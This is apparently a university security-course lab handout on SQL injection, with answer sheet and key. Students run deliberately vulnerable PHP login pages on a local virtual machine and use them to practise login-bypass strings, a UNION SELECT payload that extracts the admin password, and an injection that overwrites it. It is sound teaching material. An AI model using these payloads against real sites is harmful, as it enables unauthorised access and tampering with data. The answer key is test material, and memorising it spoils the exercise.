ECE 4112 Internetwork Security SQL Injections Group number: _________________ Group members: ___________________________ ___________________________ Goal: The goal of this lab is to understand how SQL injections work, and the defenses against them. Summary: In this lab you will install the programs necessary to run a HTTP server using PHP and mySQL. You will then exploit the web pages given to you, using SQL injections. Background and Theory: SQL injections are when SQL code is given as user input. If the user input is not validated, the SQL code can be run. This vulnerability is common among amateur sites. It allows an attacker to login as a privileged user, edit, or outright delete database entries. Prelab Questions: None. Lab Scenario: This lab will be using web server programs run on your Windows XP virtual machine. WAMP5 is used for the web server, SQL server, and php server. Section 1: Setup and Basic Injections First we will install WAMP. This is an integrated package for Windows Apache MySQL and PHP. Copy wamp5_1.5.0c.exe from your CD into your tools folder. Run wamp5_1.5.0c.exe. Click Next Click I accept the agreement Click Next 4 times. Click Install. Click Ok. Click Open. Click Yes. Click Finish. Now you have Apache, MySQL, and PHP all running on your Windows virtual machine. Copy login.sql from the CD to your tools folder. Left click on the WAMP system tray icon (the speedometer). Choose MySQL, then choose MySQL console. At the console prompt: The default password is blank so just hit enter. mysql> source ; But replace with the full path of where you copied the login.sql file. Copy login.php, admin.php, user.php, and guest.php into c:\wamp\www Open up your browser and go to page http://localhost/login.php There are 3 users: admin, user, and guest. Try to log in to each user. Q1.1: What happened when you tried to login to each user? Often, the source code of a site may not be available to an attacker. Because of this some information gathering must be done. One way is too simply try different kinds of injections. Here are some common injection strings: ' or 'x'='x ') or ('x'='x ' or 1=1--" or 1=1--or 1=1--" or 0=0 --or 0=0 --' or 0=0 # " or 0=0 # ' or a=a--") or ("a"="a hi" or "a"="a hi" or 1=1 --hi' or 1=1 --hi") or ("a"="a Try putting these into the username field and logging in. Note: it is important that you put a space at the end of each string such as: “’ or ‘x’=’x “. Find an injection which when put into the username field will let you log in. Q1.2: Which injection string allowed you to login? Q1.3: What kind of user did you log in as? Now we are going to try to log in as admin. Put admin in the username field, and injection strings into the password field. Q1.4: Which injection string allowed you to login as admin? Section 2: Retreiving and Editing Data Log in as a guest. The guest page has a feature where you can look up a username and get their real name. We are going to use this feature to get the password of the admin. In the text box type: “ UNION SELECT password FROM logintable WHERE username=”admin” – Note: make sure to include an extra space at the end of the input Click on submit. Q2.1: What is the password of the admin? Q2.2: What is the password of the user? Log in as “user.” The user page has a feature where you can change your password. We are going to use this feature to change the password of the admin. In the textbox type: password” WHERE username=”admin” – Note: make sure to include an extra space at the end of the input Click on submit. The admin’s password has now been changed to password. Go back to the login page and try to login as admin using the new password. Q2.3: Were you able to login as the admin with the password “password”? Answer Sheet Group Number: _______________ Member Names: _________________________ _________________________ Section 1: Setup and Basic Injections Q1.1: What happened when you tried to login to each user? Q1.2: Which injection string allowed you to login? Q1.3: What kind of user did you log in as? Q1.4: Which injection string allowed you to login as admin? Section 2: Retreiving and Editing Data Q2.1: What is the password of the admin? Q2.2: What is the password of the user? Q2.3: Were you able to login as the admin with the password “password”? Suggested Additions and Future Enhancements: Answer Key Section 1: Setup and Basic Injections Q1.1: What happened when you tried to login to each user? If you don’t enter a password, admin and user will fail, but you will be able to login as guest. Q1.2: Which injection string allowed you to login? " or 1=1--" or 0=0 --" or 0=0 # Will all work, any one of these will be sufficient. Q1.3: What kind of user did you log in as? guest Q1.4: Which injection string allowed you to login as admin? " or 1=1--" or 0=0 --" or 0=0 # hi" or "a"="a hi" or 1=1 --Will all work, any one of these will be sufficient. Section 2: Retreiving and Editing Data Q2.1: What is the password of the admin? secure Q2.2: What is the password of the user? password Q2.3: Were you able to login as the admin with the password “password”? yes

Public Domain

views:250

downloads:20

rating:not rated

reviews:0

posted:11/15/2007

language:English